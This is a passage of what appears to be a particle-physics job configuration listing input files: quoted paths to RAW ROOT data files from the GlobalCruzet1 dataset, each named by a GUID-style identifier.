'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/580242EB-BD1C-DD11-B34E-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5807F882-CA1C-DD11-B19D-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5819A263-C41C-DD11-B93A-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5856C70C-BE1C-DD11-90DF-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFC591-CC1C-DD11-9D51-001617C3B6C6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFCDE8-BD1C-DD11-924A-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58C248C6-D01C-DD11-B059-0019DB29C620.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A00E33C-C61C-DD11-B95A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A22A0B4-CE1C-DD11-A7BD-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5AB6A96D-C81C-DD11-9224-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5ABCF4EA-BD1C-DD11-BEC4-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C00E13C-C61C-DD11-BC62-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C029908-BE1C-DD11-8D92-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C8FF55E-C41C-DD11-A1B7-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EC8D0EF-BD1C-DD11-AF64-001617C3B5E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EDD9A34-C21C-DD11-83C7-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EE95EF0-BD1C-DD11-8A21-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/625095C3-D01C-DD11-9A3D-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62BB3764-C81C-DD11-BBD3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62D3B406-BE1C-DD11-A3C3-000423D94AA8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62E3211E-C01C-DD11-93FE-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/666DBCE5-BB1C-DD11-8798-000423D94AA8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/66F8A946-C41C-DD11-92FC-000423D98DB4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/68773EEE-BB1C-DD11-BABD-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A2E651E-C01C-DD11-84C1-000423D94990.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A44B7C8-D01C-DD11-8F4F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A6DB7F0-BB1C-DD11-9956-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6CCACD33-C21C-DD11-A4E2-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6E894A32-C21C-DD11-AD3B-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/703CC249-C41C-DD11-B7EE-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7042ABF9-BB1C-DD11-99CB-000423D996B4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/70929317-C01C-DD11-8762-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/72014426-C21C-DD11-AC2E-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7442701B-C21C-DD11-B0D4-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/74E7AFF1-BB1C-DD11-BDEE-000423D944FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/760CE253-C41C-DD11-9431-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/763379F4-BF1C-DD11-B9FF-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7647D092-CA1C-DD11-922E-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/766816D6-BB1C-DD11-BC35-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/769F4256-C41C-DD11-858D-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76AEBDBF-D01C-DD11-A47D-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76C8B52A-C21C-DD11-BF56-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B3F914-C01C-DD11-B45B-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B871C3-D01C-DD11-AE14-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78D879C3-D01C-DD11-AB54-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7AA262D0-B91C-DD11-9AE8-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C5A8EDE-BB1C-DD11-8883-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C91A4D1-D01C-DD11-9C38-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CA38092-CC1C-DD11-B3CD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CBF8F21-C21C-DD11-AE6F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CCAEC8D-CA1C-DD11-ACE0-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CD95E12-C01C-DD11-946F-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CF8CCB7-CE1C-DD11-BBC5-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7E88CB00-BE1C-DD11-A4F2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/807685B9-CE1C-DD11-BDE9-001617DBD316.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/821564AD-CE1C-DD11-935B-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/827CD5E5-BD1C-DD11-8A9D-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/82E4352D-C21C-DD11-A609-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8408B7F0-BB1C-DD11-8737-000423D98930.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8434B0D0-BB1C-DD11-B3FF-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B26D4E-C41C-DD11-A476-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B564D5-BB1C-DD11-8DAC-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86BB41EB-BD1C-DD11-AC05-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88C52BD1-B91C-DD11-9018-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88E8E765-C81C-DD11-B9F5-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8A50CFD5-BB1C-DD11-A5AC-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8ADC3A47-C61C-DD11-8B91-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C313DA9-CE1C-DD11-886B-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5B3009-C01C-DD11-9CBD-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5EEA19-C01C-DD11-87DB-000423D98AF0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CDE12B8-CE1C-DD11-B016-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CF25D88-CC1C-DD11-87AC-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8E7CCBC9-B91C-DD11-9DC7-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EAAD7EF-BD1C-DD11-87A9-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EB94A9D-CA1C-DD11-BD37-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9002413D-C61C-DD11-8F13-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/904500F6-BF1C-DD11-A72B-000423D6B358.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90650142-C61C-DD11-9D29-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/906666A6-CE1C-DD11-8150-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90C564AD-CE1C-DD11-8CB2-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90D4F325-C21C-DD11-8AE2-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/927D4BCC-B91C-DD11-901B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9436CC91-CC1C-DD11-AAD9-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/94DF6FBE-D01C-DD11-AF80-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9623B3D8-D21C-DD11-87DF-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96C5EF49-C41C-DD11-924D-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96FA9F95-CA1C-DD11-B4F2-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9897F7DF-BB1C-DD11-9A1B-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A03A402-C01C-DD11-8445-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3AAC06-BE1C-DD11-ABCE-001617C3B654.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3F7F01-BE1C-DD11-9163-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9AECBFAD-CE1C-DD11-8024-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CD29BC2-B91C-DD11-AA74-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CE491F4-BB1C-DD11-99D6-000423D98750.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E0AB00E-C01C-DD11-B975-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E3A7467-C81C-DD11-8ED6-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EEA60D4-B91C-DD11-A2CC-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EF3B958-C41C-DD11-B6DA-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A039DFF6-BD1C-DD11-B92E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A054B619-C21C-DD11-B913-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A0E92059-C41C-DD11-A68C-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2287EA3-CC1C-DD11-9191-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A22A0AA2-CC1C-DD11-B64A-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A24F3E0A-C01C-DD11-9FBB-001617C3B6C6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A298BAC8-B91C-DD11-B235-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2C47E4E-C61C-DD11-9003-001617C3B6CE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4412EE2-BD1C-DD11-91AD-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A441E958-C81C-DD11-87EF-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A45B800F-C01C-DD11-A4C3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4743792-CC1C-DD11-8FF3-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4956AC1-D01C-DD11-831E-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4C86A24-C21C-DD11-A311-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A600E0DA-BB1C-DD11-A3FA-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A6C9CEAB-CE1C-DD11-9068-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A83BF12B-C21C-DD11-BA3F-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85100F9-BB1C-DD11-8610-000423D9989E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85B574E-C41C-DD11-9727-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A89BB268-C81C-DD11-B973-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A8B4ACF4-BF1C-DD11-B38C-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA0830DB-D21C-DD11-8065-000423D6CA42.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA22C202-BE1C-DD11-9FB5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AAC9C441-C61C-DD11-8BD3-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/ACA9E015-C21C-DD11-BA35-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE02DC53-C41C-DD11-8FE6-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE0D0D54-C41C-DD11-9BB8-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE240861-C81C-DD11-80B8-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE6999EC-BB1C-DD11-8866-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE7136CC-B91C-DD11-9831-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE86A9B9-D01C-DD11-A29D-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE8F9A49-C41C-DD11-8B66-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B009918A-CA1C-DD11-982D-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B016F7FB-BD1C-DD11-B8B6-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B01F2516-C21C-DD11-8FC3-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02481F5-BD1C-DD11-8A72-001617E30D4A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02B64D6-BB1C-DD11-A3CE-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B051A8FB-BD1C-DD11-B7AB-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0683BFC-BD1C-DD11-B043-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B09FBB45-C21C-DD11-B2EE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0A93C4F-C41C-DD11-8736-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B2B62AB9-D01C-DD11-B55B-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B41E2C53-C61C-DD11-A94F-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B438131A-C21C-DD11-B626-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4517446-C61C-DD11-ACBC-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4779F8A-CC1C-DD11-BFB1-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4CF580D-C01C-DD11-8B5D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B612C72A-C21C-DD11-BD75-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B67DD69E-CE1C-DD11-8F69-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B6897EC8-B91C-DD11-BD5F-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B80F3696-CA1C-DD11-BD90-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81950D8-D21C-DD11-B36F-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81B443A-C61C-DD11-A800-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B83C61F5-BD1C-DD11-B5FD-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B8599355-C81C-DD11-A68F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA002BE5-BB1C-DD11-A279-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA48FBA7-CC1C-DD11-BA37-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA68A5D2-B91C-DD11-8939-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAB7A2F5-BD1C-DD11-8CE7-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAFBE4CF-D01C-DD11-AD5D-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC03A04C-C61C-DD11-B6C6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC58B4B7-CE1C-DD11-B473-0016177CA7A0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE3C2165-C41C-DD11-BCB1-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE708B20-C01C-DD11-9862-000423D98BC4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEA65F0C-C01C-DD11-983A-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEB2F75E-C41C-DD11-A2D1-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C015805E-C81C-DD11-AF4A-001617E30CE8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C02B2DE2-BD1C-DD11-A5FD-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2053F88-CA1C-DD11-890F-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C26F6CB5-CE1C-DD11-A748-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2A2F3D3-D21C-DD11-B7BE-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2BFF2E5-BD1C-DD11-93D1-001617E30D40.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2DC70C3-CC1C-DD11-8234-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C45BCFEF-BB1C-DD11-AF09-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C46CC141-C61C-DD11-9FDA-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C4E9EB89-CC1C-DD11-AEC2-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C645C5B9-CE1C-DD11-BFD0-001617C3B78C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C65D8692-CC1C-DD11-B7B5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C697C4F1-BD1C-DD11-8550-001617C3B66C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6DB2D95-CC1C-DD11-8C3F-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6E0A522-C21C-DD11-9C24-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6ED43E7-BB1C-DD11-8A18-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C80D9AEC-BB1C-DD11-8974-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8335398-CC1C-DD11-A2D4-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8E8C504-C01C-DD11-85C6-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA2218B6-D01C-DD11-979F-000423D6B42C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA368935-C21C-DD11-9788-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA3844EB-BD1C-DD11-913E-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA65A6FA-BF1C-DD11-8CC1-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CAB471E2-BD1C-DD11-9D4E-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC12A30D-C01C-DD11-8A10-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC8E9A1F-C21C-DD11-ADF9-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE497BC3-D01C-DD11-928A-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE6685CE-D01C-DD11-BE9B-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D01B6C02-BE1C-DD11-897C-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D06A2FCC-B91C-DD11-A9DA-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D221ABE5-BB1C-DD11-9DB3-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D28A8F02-C01C-DD11-9866-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D2B2FDB2-CE1C-DD11-8F56-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D47C0DE8-BD1C-DD11-9B8C-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D6D574D2-BB1C-DD11-981F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8776455-C81C-DD11-8D7F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8B0FBB8-D01C-DD11-A27F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8FF2B18-C01C-DD11-9B55-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DA4A4889-CC1C-DD11-8A16-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAD4298E-CA1C-DD11-A10E-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAEE505E-C81C-DD11-980A-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC13C55E-C81C-DD11-BAC1-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC1B6554-C61C-DD11-BF49-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC4E4EA8-CE1C-DD11-8FC3-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC709BFC-BF1C-DD11-A6B7-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE27427E-CA1C-DD11-935C-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE504FEB-BD1C-DD11-B7B8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E06A7CF4-BB1C-DD11-9694-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E08DE8FC-BF1C-DD11-8C8E-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0A9CA00-BE1C-DD11-9C4E-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0DE281D-BE1C-DD11-8AA4-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E28F4E88-CA1C-DD11-AD78-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2AC1367-C81C-DD11-9EA9-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2D03EA8-CE1C-DD11-BEBD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E41BC293-CC1C-DD11-8E24-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E438B3FA-BB1C-DD11-87A6-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E43E694A-C41C-DD11-B161-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E445BB2A-C21C-DD11-BFE6-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E451BF1C-C01C-DD11-8AB4-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E60810B4-CE1C-DD11-812E-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8AFD30A-C01C-DD11-85A6-001617C3B778.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8CECFF9-BF1C-DD11-B9C7-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAC5E41D-C01C-DD11-8BE1-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAF03AE7-BB1C-DD11-848C-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE214960-C81C-DD11-A182-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE4E914E-C41C-DD11-A095-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE5A5200-BE1C-DD11-81C8-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EEAFA849-C41C-DD11-8203-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F0C47660-C81C-DD11-9107-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2075E91-CA1C-DD11-B1C4-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F207EC43-C61C-DD11-A230-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2300AB3-CE1C-DD11-A36B-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2716924-C21C-DD11-B757-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2790FCC-D01C-DD11-97CE-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F29E7046-C61C-DD11-862A-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2CDC2D1-D21C-DD11-91F2-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F40BA1F2-BB1C-DD11-9148-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F45D0661-C81C-DD11-A2A2-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F4C05AC2-B91C-DD11-A0C5-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F684A2FE-BF1C-DD11-8C85-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F6D667DC-BB1C-DD11-8993-001617DBD224.root',
